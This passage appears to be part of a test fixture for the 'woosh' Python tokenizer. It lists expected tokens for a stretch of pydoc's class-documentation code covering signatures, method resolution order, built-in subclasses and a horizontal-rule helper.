woosh.Token(woosh.NAME, 'realname', 1310, 41, 1310, 49),
woosh.Token(woosh.OP, ')', 1310, 49, 1310, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 1310, 50, 1311, 0),
woosh.Token(woosh.DEDENT, ' ', 1311, 0, 1311, 8),
woosh.Token(woosh.NAME, 'else', 1311, 8, 1311, 12),
woosh.Token(woosh.OP, ':', 1311, 12, 1311, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1311, 13, 1312, 0),
woosh.Token(woosh.INDENT, ' ', 1312, 0, 1312, 12),
woosh.Token(woosh.NAME, 'title', 1312, 12, 1312, 17),
woosh.Token(woosh.OP, '=', 1312, 18, 1312, 19),
woosh.Token(woosh.NAME, 'self', 1312, 20, 1312, 24),
woosh.Token(woosh.OP, '.', 1312, 24, 1312, 25),
woosh.Token(woosh.NAME, 'bold', 1312, 25, 1312, 29),
woosh.Token(woosh.OP, '(', 1312, 29, 1312, 30),
woosh.Token(woosh.NAME, 'name', 1312, 30, 1312, 34),
woosh.Token(woosh.OP, ')', 1312, 34, 1312, 35),
woosh.Token(woosh.OP, '+', 1312, 36, 1312, 37),
woosh.Token(woosh.STRING, "' = class '", 1312, 38, 1312, 49),
woosh.Token(woosh.OP, '+', 1312, 50, 1312, 51),
woosh.Token(woosh.NAME, 'realname', 1312, 52, 1312, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1312, 60, 1313, 0),
woosh.Token(woosh.DEDENT, ' ', 1313, 0, 1313, 8),
woosh.Token(woosh.NAME, 'if', 1313, 8, 1313, 10),
woosh.Token(woosh.NAME, 'bases', 1313, 11, 1313, 16),
woosh.Token(woosh.OP, ':', 1313, 16, 1313, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1313, 17, 1314, 0),
woosh.Token(woosh.INDENT, ' ', 1314, 0, 1314, 12),
woosh.Token(woosh.NAME, 'parents', 1314, 12, 1314, 19),
woosh.Token(woosh.OP, '=', 1314, 20, 1314, 21),
woosh.Token(woosh.NAME, 'map', 1314, 22, 1314, 25),
woosh.Token(woosh.OP, '(', 1314, 25, 1314, 26),
woosh.Token(woosh.NAME, 'makename', 1314, 26, 1314, 34),
woosh.Token(woosh.OP, ',', 1314, 34, 1314, 35),
woosh.Token(woosh.NAME, 'bases', 1314, 36, 1314, 41),
woosh.Token(woosh.OP, ')', 1314, 41, 1314, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1314, 42, 1315, 0),
woosh.Token(woosh.NAME, 'title', 1315, 12, 1315, 17),
woosh.Token(woosh.OP, '=', 1315, 18, 1315, 19),
woosh.Token(woosh.NAME, 'title', 1315, 20, 1315, 25),
woosh.Token(woosh.OP, '+', 1315, 26, 1315, 27),
woosh.Token(woosh.STRING, "'(%s)'", 1315, 28, 1315, 34),
woosh.Token(woosh.OP, '%', 1315, 35, 1315, 36),
woosh.Token(woosh.STRING, "', '", 1315, 37, 1315, 41),
woosh.Token(woosh.OP, '.', 1315, 41, 1315, 42),
woosh.Token(woosh.NAME, 'join', 1315, 42, 1315, 46),
woosh.Token(woosh.OP, '(', 1315, 46, 1315, 47),
woosh.Token(woosh.NAME, 'parents', 1315, 47, 1315, 54),
woosh.Token(woosh.OP, ')', 1315, 54, 1315, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1315, 55, 1316, 0),
woosh.Token(woosh.DEDENT, ' ', 1317, 0, 1317, 8),
woosh.Token(woosh.NAME, 'contents', 1317, 8, 1317, 16),
woosh.Token(woosh.OP, '=', 1317, 17, 1317, 18),
woosh.Token(woosh.OP, '[', 1317, 19, 1317, 20),
woosh.Token(woosh.OP, ']', 1317, 20, 1317, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1317, 21, 1318, 0),
woosh.Token(woosh.NAME, 'push', 1318, 8, 1318, 12),
woosh.Token(woosh.OP, '=', 1318, 13, 1318, 14),
woosh.Token(woosh.NAME, 'contents', 1318, 15, 1318, 23),
woosh.Token(woosh.OP, '.', 1318, 23, 1318, 24),
woosh.Token(woosh.NAME, 'append', 1318, 24, 1318, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1318, 30, 1319, 0),
woosh.Token(woosh.NAME, 'try', 1320, 8, 1320, 11),
woosh.Token(woosh.OP, ':', 1320, 11, 1320, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1320, 12, 1321, 0),
woosh.Token(woosh.INDENT, ' ', 1321, 0, 1321, 12),
woosh.Token(woosh.NAME, 'signature', 1321, 12, 1321, 21),
woosh.Token(woosh.OP, '=', 1321, 22, 1321, 23),
woosh.Token(woosh.NAME, 'inspect', 1321, 24, 1321, 31),
woosh.Token(woosh.OP, '.', 1321, 31, 1321, 32),
woosh.Token(woosh.NAME, 'signature', 1321, 32, 1321, 41),
woosh.Token(woosh.OP, '(', 1321, 41, 1321, 42),
woosh.Token(woosh.NAME, 'object', 1321, 42, 1321, 48),
woosh.Token(woosh.OP, ')', 1321, 48, 1321, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1321, 49, 1322, 0),
woosh.Token(woosh.DEDENT, ' ', 1322, 0, 1322, 8),
woosh.Token(woosh.NAME, 'except', 1322, 8, 1322, 14),
woosh.Token(woosh.OP, '(', 1322, 15, 1322, 16),
woosh.Token(woosh.NAME, 'ValueError', 1322, 16, 1322, 26),
woosh.Token(woosh.OP, ',', 1322, 26, 1322, 27),
woosh.Token(woosh.NAME, 'TypeError', 1322, 28, 1322, 37),
woosh.Token(woosh.OP, ')', 1322, 37, 1322, 38),
woosh.Token(woosh.OP, ':', 1322, 38, 1322, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1322, 39, 1323, 0),
woosh.Token(woosh.INDENT, ' ', 1323, 0, 1323, 12),
woosh.Token(woosh.NAME, 'signature', 1323, 12, 1323, 21),
woosh.Token(woosh.OP, '=', 1323, 22, 1323, 23),
woosh.Token(woosh.NAME, 'None', 1323, 24, 1323, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1323, 28, 1324, 0),
woosh.Token(woosh.DEDENT, ' ', 1324, 0, 1324, 8),
woosh.Token(woosh.NAME, 'if', 1324, 8, 1324, 10),
woosh.Token(woosh.NAME, 'signature', 1324, 11, 1324, 20),
woosh.Token(woosh.OP, ':', 1324, 20, 1324, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1324, 21, 1325, 0),
woosh.Token(woosh.INDENT, ' ', 1325, 0, 1325, 12),
woosh.Token(woosh.NAME, 'argspec', 1325, 12, 1325, 19),
woosh.Token(woosh.OP, '=', 1325, 20, 1325, 21),
woosh.Token(woosh.NAME, 'str', 1325, 22, 1325, 25),
woosh.Token(woosh.OP, '(', 1325, 25, 1325, 26),
woosh.Token(woosh.NAME, 'signature', 1325, 26, 1325, 35),
woosh.Token(woosh.OP, ')', 1325, 35, 1325, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1325, 36, 1326, 0),
woosh.Token(woosh.NAME, 'if', 1326, 12, 1326, 14),
woosh.Token(woosh.NAME, 'argspec', 1326, 15, 1326, 22),
woosh.Token(woosh.NAME, 'and', 1326, 23, 1326, 26),
woosh.Token(woosh.NAME, 'argspec', 1326, 27, 1326, 34),
woosh.Token(woosh.OP, '!=', 1326, 35, 1326, 37),
woosh.Token(woosh.STRING, "'()'", 1326, 38, 1326, 42),
woosh.Token(woosh.OP, ':', 1326, 42, 1326, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1326, 43, 1327, 0),
woosh.Token(woosh.INDENT, ' ', 1327, 0, 1327, 16),
woosh.Token(woosh.NAME, 'push', 1327, 16, 1327, 20),
woosh.Token(woosh.OP, '(', 1327, 20, 1327, 21),
woosh.Token(woosh.NAME, 'name', 1327, 21, 1327, 25),
woosh.Token(woosh.OP, '+', 1327, 26, 1327, 27),
woosh.Token(woosh.NAME, 'argspec', 1327, 28, 1327, 35),
woosh.Token(woosh.OP, '+', 1327, 36, 1327, 37),
woosh.Token(woosh.STRING, "'\\n'", 1327, 38, 1327, 42),
woosh.Token(woosh.OP, ')', 1327, 42, 1327, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1327, 43, 1328, 0),
woosh.Token(woosh.DEDENT, ' ', 1329, 0, 1329, 8),
woosh.Token(woosh.DEDENT, '', 1329, 8, 1329, 8),
woosh.Token(woosh.NAME, 'doc', 1329, 8, 1329, 11),
woosh.Token(woosh.OP, '=', 1329, 12, 1329, 13),
woosh.Token(woosh.NAME, 'getdoc', 1329, 14, 1329, 20),
woosh.Token(woosh.OP, '(', 1329, 20, 1329, 21),
woosh.Token(woosh.NAME, 'object', 1329, 21, 1329, 27),
woosh.Token(woosh.OP, ')', 1329, 27, 1329, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1329, 28, 1330, 0),
woosh.Token(woosh.NAME, 'if', 1330, 8, 1330, 10),
woosh.Token(woosh.NAME, 'doc', 1330, 11, 1330, 14),
woosh.Token(woosh.OP, ':', 1330, 14, 1330, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1330, 15, 1331, 0),
woosh.Token(woosh.INDENT, ' ', 1331, 0, 1331, 12),
woosh.Token(woosh.NAME, 'push', 1331, 12, 1331, 16),
woosh.Token(woosh.OP, '(', 1331, 16, 1331, 17),
woosh.Token(woosh.NAME, 'doc', 1331, 17, 1331, 20),
woosh.Token(woosh.OP, '+', 1331, 21, 1331, 22),
woosh.Token(woosh.STRING, "'\\n'", 1331, 23, 1331, 27),
woosh.Token(woosh.OP, ')', 1331, 27, 1331, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1331, 28, 1332, 0),
woosh.Token(woosh.COMMENT, '# List the mro, if non-trivial.', 1333, 8, 1333, 39),
woosh.Token(woosh.DEDENT, ' ', 1334, 0, 1334, 8),
woosh.Token(woosh.NAME, 'mro', 1334, 8, 1334, 11),
woosh.Token(woosh.OP, '=', 1334, 12, 1334, 13),
woosh.Token(woosh.NAME, 'deque', 1334, 14, 1334, 19),
woosh.Token(woosh.OP, '(', 1334, 19, 1334, 20),
woosh.Token(woosh.NAME, 'inspect', 1334, 20, 1334, 27),
woosh.Token(woosh.OP, '.', 1334, 27, 1334, 28),
woosh.Token(woosh.NAME, 'getmro', 1334, 28, 1334, 34),
woosh.Token(woosh.OP, '(', 1334, 34, 1334, 35),
woosh.Token(woosh.NAME, 'object', 1334, 35, 1334, 41),
woosh.Token(woosh.OP, ')', 1334, 41, 1334, 42),
woosh.Token(woosh.OP, ')', 1334, 42, 1334, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1334, 43, 1335, 0),
woosh.Token(woosh.NAME, 'if', 1335, 8, 1335, 10),
woosh.Token(woosh.NAME, 'len', 1335, 11, 1335, 14),
woosh.Token(woosh.OP, '(', 1335, 14, 1335, 15),
woosh.Token(woosh.NAME, 'mro', 1335, 15, 1335, 18),
woosh.Token(woosh.OP, ')', 1335, 18, 1335, 19),
woosh.Token(woosh.OP, '>', 1335, 20, 1335, 21),
woosh.Token(woosh.NUMBER, '2', 1335, 22, 1335, 23),
woosh.Token(woosh.OP, ':', 1335, 23, 1335, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1335, 24, 1336, 0),
woosh.Token(woosh.INDENT, ' ', 1336, 0, 1336, 12),
woosh.Token(woosh.NAME, 'push', 1336, 12, 1336, 16),
woosh.Token(woosh.OP, '(', 1336, 16, 1336, 17),
woosh.Token(woosh.STRING, '"Method resolution order:"', 1336, 17, 1336, 43),
woosh.Token(woosh.OP, ')', 1336, 43, 1336, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 1336, 44, 1337, 0),
woosh.Token(woosh.NAME, 'for', 1337, 12, 1337, 15),
woosh.Token(woosh.NAME, 'base', 1337, 16, 1337, 20),
woosh.Token(woosh.NAME, 'in', 1337, 21, 1337, 23),
woosh.Token(woosh.NAME, 'mro', 1337, 24, 1337, 27),
woosh.Token(woosh.OP, ':', 1337, 27, 1337, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1337, 28, 1338, 0),
woosh.Token(woosh.INDENT, ' ', 1338, 0, 1338, 16),
woosh.Token(woosh.NAME, 'push', 1338, 16, 1338, 20),
woosh.Token(woosh.OP, '(', 1338, 20, 1338, 21),
woosh.Token(woosh.STRING, "' '", 1338, 21, 1338, 27),
woosh.Token(woosh.OP, '+', 1338, 28, 1338, 29),
woosh.Token(woosh.NAME, 'makename', 1338, 30, 1338, 38),
woosh.Token(woosh.OP, '(', 1338, 38, 1338, 39),
woosh.Token(woosh.NAME, 'base', 1338, 39, 1338, 43),
woosh.Token(woosh.OP, ')', 1338, 43, 1338, 44),
woosh.Token(woosh.OP, ')', 1338, 44, 1338, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1338, 45, 1339, 0),
woosh.Token(woosh.DEDENT, ' ', 1339, 0, 1339, 12),
woosh.Token(woosh.NAME, 'push', 1339, 12, 1339, 16),
woosh.Token(woosh.OP, '(', 1339, 16, 1339, 17),
woosh.Token(woosh.STRING, "''", 1339, 17, 1339, 19),
woosh.Token(woosh.OP, ')', 1339, 19, 1339, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1339, 20, 1340, 0),
woosh.Token(woosh.COMMENT, '# List the built-in subclasses, if any:', 1341, 8, 1341, 47),
woosh.Token(woosh.DEDENT, ' ', 1342, 0, 1342, 8),
woosh.Token(woosh.NAME, 'subclasses', 1342, 8, 1342, 18),
woosh.Token(woosh.OP, '=', 1342, 19, 1342, 20),
woosh.Token(woosh.NAME, 'sorted', 1342, 21, 1342, 27),
woosh.Token(woosh.OP, '(', 1342, 27, 1342, 28),
woosh.Token(woosh.OP, '(', 1343, 12, 1343, 13),
woosh.Token(woosh.NAME, 'str', 1343, 13, 1343, 16),
woosh.Token(woosh.OP, '(', 1343, 16, 1343, 17),
woosh.Token(woosh.NAME, 'cls', 1343, 17, 1343, 20),
woosh.Token(woosh.OP, '.', 1343, 20, 1343, 21),
woosh.Token(woosh.NAME, '__name__', 1343, 21, 1343, 29),
woosh.Token(woosh.OP, ')', 1343, 29, 1343, 30),
woosh.Token(woosh.NAME, 'for', 1343, 31, 1343, 34),
woosh.Token(woosh.NAME, 'cls', 1343, 35, 1343, 38),
woosh.Token(woosh.NAME, 'in', 1343, 39, 1343, 41),
woosh.Token(woosh.NAME, 'type', 1343, 42, 1343, 46),
woosh.Token(woosh.OP, '.', 1343, 46, 1343, 47),
woosh.Token(woosh.NAME, '__subclasses__', 1343, 47, 1343, 61),
woosh.Token(woosh.OP, '(', 1343, 61, 1343, 62),
woosh.Token(woosh.NAME, 'object', 1343, 62, 1343, 68),
woosh.Token(woosh.OP, ')', 1343, 68, 1343, 69),
woosh.Token(woosh.NAME, 'if', 1344, 13, 1344, 15),
woosh.Token(woosh.NAME, 'not', 1344, 16, 1344, 19),
woosh.Token(woosh.NAME, 'cls', 1344, 20, 1344, 23),
woosh.Token(woosh.OP, '.', 1344, 23, 1344, 24),
woosh.Token(woosh.NAME, '__name__', 1344, 24, 1344, 32),
woosh.Token(woosh.OP, '.', 1344, 32, 1344, 33),
woosh.Token(woosh.NAME, 'startswith', 1344, 33, 1344, 43),
woosh.Token(woosh.OP, '(', 1344, 43, 1344, 44),
woosh.Token(woosh.STRING, '"_"', 1344, 44, 1344, 47),
woosh.Token(woosh.OP, ')', 1344, 47, 1344, 48),
woosh.Token(woosh.NAME, 'and', 1344, 49, 1344, 52),
woosh.Token(woosh.NAME, 'cls', 1344, 53, 1344, 56),
woosh.Token(woosh.OP, '.', 1344, 56, 1344, 57),
woosh.Token(woosh.NAME, '__module__', 1344, 57, 1344, 67),
woosh.Token(woosh.OP, '==', 1344, 68, 1344, 70),
woosh.Token(woosh.STRING, '"builtins"', 1344, 71, 1344, 81),
woosh.Token(woosh.OP, ')', 1344, 81, 1344, 82),
woosh.Token(woosh.OP, ',', 1344, 82, 1344, 83),
woosh.Token(woosh.NAME, 'key', 1345, 12, 1345, 15),
woosh.Token(woosh.OP, '=', 1345, 15, 1345, 16),
woosh.Token(woosh.NAME, 'str', 1345, 16, 1345, 19),
woosh.Token(woosh.OP, '.', 1345, 19, 1345, 20),
woosh.Token(woosh.NAME, 'lower', 1345, 20, 1345, 25),
woosh.Token(woosh.OP, ')', 1346, 8, 1346, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 1346, 9, 1347, 0),
woosh.Token(woosh.NAME, 'no_of_subclasses', 1347, 8, 1347, 24),
woosh.Token(woosh.OP, '=', 1347, 25, 1347, 26),
woosh.Token(woosh.NAME, 'len', 1347, 27, 1347, 30),
woosh.Token(woosh.OP, '(', 1347, 30, 1347, 31),
woosh.Token(woosh.NAME, 'subclasses', 1347, 31, 1347, 41),
woosh.Token(woosh.OP, ')', 1347, 41, 1347, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1347, 42, 1348, 0),
woosh.Token(woosh.NAME, 'MAX_SUBCLASSES_TO_DISPLAY', 1348, 8, 1348, 33),
woosh.Token(woosh.OP, '=', 1348, 34, 1348, 35),
woosh.Token(woosh.NUMBER, '4', 1348, 36, 1348, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1348, 37, 1349, 0),
woosh.Token(woosh.NAME, 'if', 1349, 8, 1349, 10),
woosh.Token(woosh.NAME, 'subclasses', 1349, 11, 1349, 21),
woosh.Token(woosh.OP, ':', 1349, 21, 1349, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1349, 22, 1350, 0),
woosh.Token(woosh.INDENT, ' ', 1350, 0, 1350, 12),
woosh.Token(woosh.NAME, 'push', 1350, 12, 1350, 16),
woosh.Token(woosh.OP, '(', 1350, 16, 1350, 17),
woosh.Token(woosh.STRING, '"Built-in subclasses:"', 1350, 17, 1350, 39),
woosh.Token(woosh.OP, ')', 1350, 39, 1350, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1350, 40, 1351, 0),
woosh.Token(woosh.NAME, 'for', 1351, 12, 1351, 15),
woosh.Token(woosh.NAME, 'subclassname', 1351, 16, 1351, 28),
woosh.Token(woosh.NAME, 'in', 1351, 29, 1351, 31),
woosh.Token(woosh.NAME, 'subclasses', 1351, 32, 1351, 42),
woosh.Token(woosh.OP, '[', 1351, 42, 1351, 43),
woosh.Token(woosh.OP, ':', 1351, 43, 1351, 44),
woosh.Token(woosh.NAME, 'MAX_SUBCLASSES_TO_DISPLAY', 1351, 44, 1351, 69),
woosh.Token(woosh.OP, ']', 1351, 69, 1351, 70),
woosh.Token(woosh.OP, ':', 1351, 70, 1351, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1351, 71, 1352, 0),
woosh.Token(woosh.INDENT, ' ', 1352, 0, 1352, 16),
woosh.Token(woosh.NAME, 'push', 1352, 16, 1352, 20),
woosh.Token(woosh.OP, '(', 1352, 20, 1352, 21),
woosh.Token(woosh.STRING, "' '", 1352, 21, 1352, 27),
woosh.Token(woosh.OP, '+', 1352, 28, 1352, 29),
woosh.Token(woosh.NAME, 'subclassname', 1352, 30, 1352, 42),
woosh.Token(woosh.OP, ')', 1352, 42, 1352, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1352, 43, 1353, 0),
woosh.Token(woosh.DEDENT, ' ', 1353, 0, 1353, 12),
woosh.Token(woosh.NAME, 'if', 1353, 12, 1353, 14),
woosh.Token(woosh.NAME, 'no_of_subclasses', 1353, 15, 1353, 31),
woosh.Token(woosh.OP, '>', 1353, 32, 1353, 33),
woosh.Token(woosh.NAME, 'MAX_SUBCLASSES_TO_DISPLAY', 1353, 34, 1353, 59),
woosh.Token(woosh.OP, ':', 1353, 59, 1353, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1353, 60, 1354, 0),
woosh.Token(woosh.INDENT, ' ', 1354, 0, 1354, 16),
woosh.Token(woosh.NAME, 'push', 1354, 16, 1354, 20),
woosh.Token(woosh.OP, '(', 1354, 20, 1354, 21),
woosh.Token(woosh.STRING, "' ... and '", 1354, 21, 1354, 35),
woosh.Token(woosh.OP, '+', 1354, 36, 1354, 37),
woosh.Token(woosh.NAME, 'str', 1355, 21, 1355, 24),
woosh.Token(woosh.OP, '(', 1355, 24, 1355, 25),
woosh.Token(woosh.NAME, 'no_of_subclasses', 1355, 25, 1355, 41),
woosh.Token(woosh.OP, '-', 1355, 42, 1355, 43),
woosh.Token(woosh.NAME, 'MAX_SUBCLASSES_TO_DISPLAY', 1355, 44, 1355, 69),
woosh.Token(woosh.OP, ')', 1355, 69, 1355, 70),
woosh.Token(woosh.OP, '+', 1355, 71, 1355, 72),
woosh.Token(woosh.STRING, "' other subclasses'", 1356, 21, 1356, 40),
woosh.Token(woosh.OP, ')', 1356, 40, 1356, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1356, 41, 1357, 0),
woosh.Token(woosh.DEDENT, ' ', 1357, 0, 1357, 12),
woosh.Token(woosh.NAME, 'push', 1357, 12, 1357, 16),
woosh.Token(woosh.OP, '(', 1357, 16, 1357, 17),
woosh.Token(woosh.STRING, "''", 1357, 17, 1357, 19),
woosh.Token(woosh.OP, ')', 1357, 19, 1357, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1357, 20, 1358, 0),
woosh.Token(woosh.COMMENT, '# Cute little class to pump out a horizontal rule between sections.', 1359, 8, 1359, 75),
woosh.Token(woosh.DEDENT, ' ', 1360, 0, 1360, 8),
woosh.Token(woosh.NAME, 'class', 1360, 8, 1360, 13),
woosh.Token(woosh.NAME, 'HorizontalRule', 1360, 14, 1360, 28),
woosh.Token(woosh.OP, ':', 1360, 28, 1360, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1360, 29, 1361, 0),
woosh.Token(woosh.INDENT, ' ', 1361, 0, 1361, 12),
woosh.Token(woosh.NAME, 'def', 1361, 12, 1361, 15),
woosh.Token(woosh.NAME, '__init__', 1361, 16, 1361, 24),
woosh.Token(woosh.OP, '(', 1361, 24, 1361, 25),
woosh.Token(woosh.NAME, 'self', 1361, 25, 1361, 29),
woosh.Token(woosh.OP, ')', 1361, 29, 1361, 30),
woosh.Token(woosh.OP, ':', 1361, 30, 1361, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1361, 31, 1362, 0),
woosh.Token(woosh.INDENT, ' ', 1362, 0, 1362, 16),
woosh.Token(woosh.NAME, 'self', 1362, 16, 1362, 20),
woosh.Token(woosh.OP, '.', 1362, 20, 1362, 21),
woosh.Token(woosh.NAME, 'needone', 1362, 21, 1362, 28),
woosh.Token(woosh.OP, '=', 1362, 29, 1362, 30),
woosh.Token(woosh.NUMBER, '0', 1362, 31, 1362, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1362, 32, 1363, 0),
woosh.Token(woosh.DEDENT, ' ', 1363, 0, 1363, 12),
woosh.Token(woosh.NAME, 'def', 1363, 12, 1363, 15),
woosh.Token(woosh.NAME, 'maybe', 1363, 16, 1363, 21),
woosh.Token(woosh.OP, '(', 1363, 21, 1363, 22),
woosh.Token(woosh.NAME, 'self', 1363, 22, 1363, 26),
woosh.Token(woosh.OP, ')', 1363, 26, 1363, 27),
woosh.Token(woosh.OP, ':', 1363, 27, 1363, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1363, 28, 1364, 0),
woosh.Token(woosh.INDENT, ' ', 1364, 0, 1364, 16),
woosh.Token(woosh.NAME, 'if', 1364, 16, 1364, 18),
woosh.Token(woosh.NAME, 'self', 1364, 19, 1364, 23),
woosh.Token(woosh.OP, '.', 1364, 23, 1364, 24),
woosh.Token(woosh.NAME, 'needone', 1364, 24, 1364, 31),
woosh.Token(woosh.OP, ':', 1364, 31, 1364, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1364, 32, 1365, 0),
woosh.Token(woosh.INDENT, ' ', 1365, 0, 1365, 20),
woosh.Token(woosh.NAME, 'push', 1365, 20, 1365, 24),
woosh.Token(woosh.OP, '(', 1365, 24, 1365, 25),
woosh.Token(woosh.STRING, "'-'", 1365, 25, 1365, 28),
woosh.Token(woosh.OP, '*', 1365, 29, 1365, 30),
woosh.Token(woosh.NUMBER, '70', 1365, 31, 1365, 33),
woosh.Token(woosh.OP, ')', 1365, 33, 1365, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1365, 34, 1366, 0),
woosh.Token(woosh.DEDENT, ' ', 1366, 0, 1366, 16),
woosh.Token(woosh.NAME, 'self', 1366, 16, 1366, 20),
woosh.Token(woosh.OP, '.', 1366, 20, 1366, 21),
woosh.Token(woosh.NAME, 'needone', 1366, 21, 1366, 28),
woosh.Token(woosh.OP, '=', 1366, 29, 1366, 30),
woosh.Token(woosh.NUMBER, '1', 1366, 31, 1366, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1366, 32, 1367, 0),
woosh.Token(woosh.DEDENT, ' ', 1367, 0, 1367, 8),
woosh.Token(woosh.DEDENT, '', 1367, 8, 1367, 8),
woosh.Token(woosh.NAME, 'hr', 1367, 8, 1367, 10),
woosh.Token(woosh.OP, '=', 1367, 11, 1367, 12),
woosh.Token(woosh.NAME, 'HorizontalRule', 1367, 13, 1367, 27),
woosh.Token(woosh.OP, '(', 1367, 27, 1367, 28),
woosh.Token(woosh.OP, ')', 1367, 28, 1367, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1367, 29, 1368, 0),
woosh.Token(woosh.NAME, 'def', 1369, 8, 1369, 11),
woosh.Token(woosh.NAME, 'spill', 1369, 12, 1369, 17),
woosh.Token(woosh.OP, '(', 1369, 17, 1369, 18),
woosh.Token(woosh.NAME, 'msg', 1369, 18, 1369, 21),
woosh.Token(woosh.OP, ',', 1369, 21, 1369, 22),
woosh.Token(woosh.NAME, 'attrs', 1369, 23, 1369, 28),
woosh.Token(woosh.OP, ',', 1369, 28, 1369, 29),
woosh.Token(woosh.NAME, 'predicate', 1369, 30, 1369, 39),
woosh.Token(woosh.OP, ')', 1369, 39, 1369, 40),
woosh.Token(woosh.OP, ':', 1369, 40, 1369, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1369, 41, 1370, 0),
woosh.Token(woosh.INDENT, ' ', 1370, 0, 1370, 12),
woosh.Token(woosh.NAME, 'ok', 1370, 12, 1370, 14),
woosh.Token(woosh.OP, ',', 1370, 14, 1370, 15),
woosh.Token(woosh.NAME, 'attrs', 1370, 16, 1370, 21),
woosh.Token(woosh.OP, '=', 1370, 22, 1370, 23),
woosh.Token(woosh.NAME, '_split_list', 1370, 24, 1370, 35),
woosh.Token(woosh.OP, '(', 1370, 35, 1370, 36),
woosh.Token(woosh.NAME, 'attrs', 1370, 36, 1370, 41),
woosh.Token(woosh.OP, ',', 1370, 41, 1370, 42),
woosh.Token(woosh.NAME, 'predicate', 1370, 43, 1370, 52),
woosh.Token(woosh.OP, ')', 1370, 52, 1370, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1370, 53, 1371, 0),
woosh.Token(woosh.NAME, 'if', 1371, 12, 1371, 14),
woosh.Token(woosh.NAME, 'ok', 1371, 15, 1371, 17),
woosh.Token(woosh.OP, ':', 1371, 17, 1371, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1371, 18, 1372, 0),
woosh.Token(woosh.INDENT, ' ', 1372, 0, 1372, 16),
woosh.Token(woosh.NAME, 'hr', 1372, 16, 1372, 18),
woosh.Token(woosh.OP, '.', 1372, 18, 1372, 19),
woosh.Token(woosh.NAME, 'maybe', 1372, 19, 1372, 24),
woosh.Token(woosh.OP, '(', 1372, 24, 1372, 25),
woosh.Token(woosh.OP, ')', 1372, 25, 1372, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1372, 26, 1373, 0),
woosh.Token(woosh.NAME, 'push', 1373, 16, 1373, 20),
woosh.Token(woosh.OP, '(', 1373, 20, 1373, 21),
woosh.Token(woosh.NAME, 'msg', 1373, 21, 1373, 24),
woosh.Token(woosh.OP, ')', 1373, 24, 1373, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1373, 25, 1374, 0),
woosh.Token(woosh.NAME, 'for', 1374, 16, 1374, 19),
woosh.Token(woosh.NAME, 'name', 1374, 20, 1374, 24),
woosh.Token(woosh.OP, ',', 1374, 24, 1374, 25),
woosh.Token(woosh.NAME, 'kind', 1374, 26, 1374, 30),
woosh.Token(woosh.OP, ',', 1374, 30, 1374, 31),
woosh.Token(woosh.NAME, 'homecls', 1374, 32, 1374, 39),
woosh.Token(woosh.OP, ',', 1374, 39, 1374, 40),
woosh.Token(woosh.NAME, 'value', 1374, 41, 1374, 46),
woosh.Token(woosh.NAME, 'in', 1374, 47, 1374, 49),
woosh.Token(woosh.NAME, 'ok', 1374, 50, 1374, 52),
woosh.Token(woosh.OP, ':', 1374, 52, 1374, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1374, 53, 1375, 0),
woosh.Token(woosh.INDENT, ' ', 1375, 0, 1375, 20),
woosh.Token(woosh.NAME, 'try', 1375, 20, 1375, 23),
woosh.Token(woosh.OP, ':', 1375, 23, 1375, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1375, 24, 1376, 0),
woosh.Token(woosh.INDENT, ' ', 1376, 0, 1376, 24),
woosh.Token(woosh.NAME, 'value', 1376, 24, 1376, 29),
woosh.Token(woosh.OP, '=', 1376, 30, 1376, 31),
woosh.Token(woosh.NAME, 'getattr', 1376, 32, 1376, 39),
woosh.Token(woosh.OP, '(', 1376, 39, 1376, 40),
woosh.Token(woosh.NAME, 'object', 1376, 40, 1376, 46),
woosh.Token(woosh.OP, ',', 1376, 46, 1376, 47),
woosh.Token(woosh.NAME, 'name', 1376, 48, 1376, 52),
woosh.Token(woosh.OP, ')', 1376, 52, 1376, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1376, 53, 1377, 0),
woosh.Token(woosh.DEDENT, ' ', 1377, 0, 1377, 20),
woosh.Token(woosh.NAME, 'except', 1377, 20, 1377, 26),
